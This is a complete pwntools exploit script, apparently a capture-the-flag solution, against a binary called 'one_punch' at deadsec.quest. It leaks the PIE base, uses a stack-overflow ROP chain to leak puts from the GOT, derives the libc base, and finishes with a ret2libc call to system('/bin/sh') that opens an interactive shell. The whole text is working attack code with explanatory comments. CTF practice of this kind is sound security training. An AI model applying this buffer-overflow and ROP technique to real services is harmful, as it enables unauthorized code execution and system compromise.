from pwn import *
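elf = ELF("./one_punch")
libc = ELF("./libc.so.6")

# Target selection. The original script spawned a local process and then
# immediately rebound `r` to the remote connection, leaving an unused child
# process open for the whole run. Run as `python3 solve.py REMOTE` to talk to
# the service; add `GDB` to attach a debugger to the local process instead.
if args.REMOTE:
    r = remote("deadsec.quest", 31794)
else:
    r = elf.process()
    if args.GDB:
        gdb.attach(r, api=True)

# --- Stage 1: recover the PIE base from the address the program prints -----
# The program prints a hex address after " cape! ". The original subtracts 8
# before treating it as `one_punch`, so the printed value is presumably
# one_punch + 8 -- confirm against the binary if the base looks wrong.
r.recvuntil(b" cape! ")
one_punch = int(r.recvline(), 16) - 0x8
elf.address = one_punch - elf.sym["one_punch"]
log.success(f"Base address = {hex(elf.address)}")

# --- Binary-relative addresses (values taken from the original script) -----
OFFSET = 112  # bytes from the start of the overflowed buffer to the saved rip
pop_rdi = elf.address + 0x1291        # pop rdi; ret
ret_gadget = elf.address + 0x101a     # presumably a lone `ret` for stack alignment
stage1_entry = elf.address + 0x139e   # first return target of the leak chain
reenter = elf.address + 0x13f4        # return here after puts so input is read again

# --- Stage 2: read puts@GOT through puts@PLT, then re-enter for round two ---
r.recv()  # drain the first prompt; its exact text is not asserted anywhere
payload = cyclic(OFFSET) + b"".join([
    p64(stage1_entry),
    p64(ret_gadget),
    p64(pop_rdi),
    p64(elf.got["puts"]),
    p64(elf.plt["puts"]),
    p64(reenter),
])
r.sendline(payload)
print(payload)

# puts() writes the 6 significant bytes of the pointer; pad to a full qword.
libc_leak = u64(r.recv(6).ljust(8, b'\0'))
log.success(f"puts leak: {hex(libc_leak)}")

# Derive the base from the symbol table of the shipped libc instead of the
# hard-coded 0x80ed0 the original used, so swapping libc.so.6 keeps working.
libc.address = libc_leak - libc.sym["puts"]
if libc.address & 0xfff:
    # A non page-aligned base means the leak or the libc file is wrong.
    log.error(f"libc base {hex(libc.address)} is not page aligned; check ./libc.so.6 and the leak")
log.success(f"LIBC base : {hex(libc.address)}")

# --- Stage 3: ret2libc ------------------------------------------------------
payload = cyclic(OFFSET) + b"".join([
    p64(ret_gadget),
    p64(pop_rdi),
    p64(next(libc.search(b"/bin/sh"))),
    p64(libc.sym["system"]),
])
r.sendlineafter(b"hero?", payload)
r.interactive()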